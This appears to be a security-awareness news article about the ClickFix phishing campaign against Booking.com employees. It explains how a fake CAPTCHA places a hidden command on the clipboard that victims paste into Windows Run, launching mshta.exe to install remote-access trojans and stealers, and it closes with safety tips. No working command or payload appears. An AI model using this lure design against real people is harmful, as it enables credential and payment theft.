A New Cyber Threat Hits Booking.com
A dangerous cyberattack campaign called ClickFix is now targeting Booking.com. This well-known travel platform is used by millions of people to book hotels, resorts, and vacation stays. But now, cybercriminals are using clever tricks to steal personal and financial information from both hotel staff and guests.
Hackers behind this attack use fake emails to trick Booking.com employees. These emails look like they come from real customers or even from the company itself. They ask the recipient to fix an issue, verify an account, or check a bad review. To do so, they must complete a “CAPTCHA” test. However, this is a trap. Instead of a real security check, this CAPTCHA is a trick that helps hackers secretly install dangerous programs on the victim’s computer.
This attack is particularly dangerous because it appears so convincing. The fake CAPTCHA makes people feel like they are doing something normal and safe. But in reality, they are unknowingly giving hackers control over their systems.
How the ClickFix Scam Works
Cybercriminals behind ClickFix have developed a step-by-step method to steal sensitive data. Their main goal is to gain access to Booking.com employee accounts, which store customer information, including payment details and personal data. The attack begins with hackers sending phishing emails that appear to come from Booking.com customers, fellow employees, or even the company itself. These emails may discuss a fake complaint, a customer query, or an important update. Within the email, there is a button or a PDF attachment containing a link. Clicking on this link directs the user to a website that mimics a real CAPTCHA page, tricking them into believing they are verifying their identity.
Once the user completes the fake CAPTCHA, an invisible command is copied to their clipboard, the temporary storage space for copied text on a computer. The victim is then instructed to open the Windows Run command and paste the copied content. Since they cannot see what was copied, they unknowingly execute a malicious command on their computer. This command triggers the mshta.exe program, which downloads and installs various types of malware on the system. Once installed, these malicious programs allow hackers to remotely control the infected computer, steal passwords, and access sensitive customer data.
What Happens After the Infection?
The malware downloaded by ClickFix attacks is extremely dangerous. These programs allow hackers to spy on users, steal financial data, and even take full control of the infected device. Here are some of the most harmful malware being used in this attack:
- XWorm: A type of remote access trojan (RAT) that allows hackers to take over a system and control it from afar.
- Lumma Stealer: A tool that steals saved passwords, credit card details, and other personal information.
- VenomRAT: A program that gives attackers full access to a computer’s files and camera.
- AsyncRAT: Used to monitor a victim’s activities and steal private information.
- Danabot: A banking trojan that steals financial data.
- NetSupport RAT: A remote access tool that gives hackers full control of an infected computer.
With these tools, cybercriminals can steal money, access private customer details, and even use hacked accounts to launch more attacks on Booking.com users. Once they have access to an employee’s account, they can send emails to real customers, tricking them into sharing their personal data.
This means guests who have booked hotels through Booking.com might also be at risk. If a hacker-controlled employee account messages them, they could be tricked into providing their credit card details or clicking on dangerous links.
How to Stay Safe from ClickFix Attacks
With cyberattacks becoming more sophisticated, it’s important for both employees and customers to stay alert. To avoid falling victim to scams like ClickFix, always verify the sender’s email address when receiving unexpected messages asking you to click a link or download a file. Scammers often create a sense of urgency to push victims into acting without thinking, so always pause and verify before taking action. If an email or website asks you to copy and paste something into your computer’s Run command, do not do it, as this is a major red flag. Installing strong security software can help detect and block malicious programs before they infect your computer. Employees and users should enable two-factor authentication (2FA) on their Booking.com accounts for added security. Lastly, if you receive a suspicious email claiming to be from Booking.com, report it immediately to the company’s security team to prevent further attacks.
This latest ClickFix cyberattack shows how dangerous modern phishing scams have become. Even trusted platforms like Booking.com can be used by hackers to launch attacks on unsuspecting users. The best way to stay safe is to remain cautious and follow cybersecurity best practices. Cybercriminals are always coming up with new tricks, but by staying informed, users can protect themselves from falling into their traps.
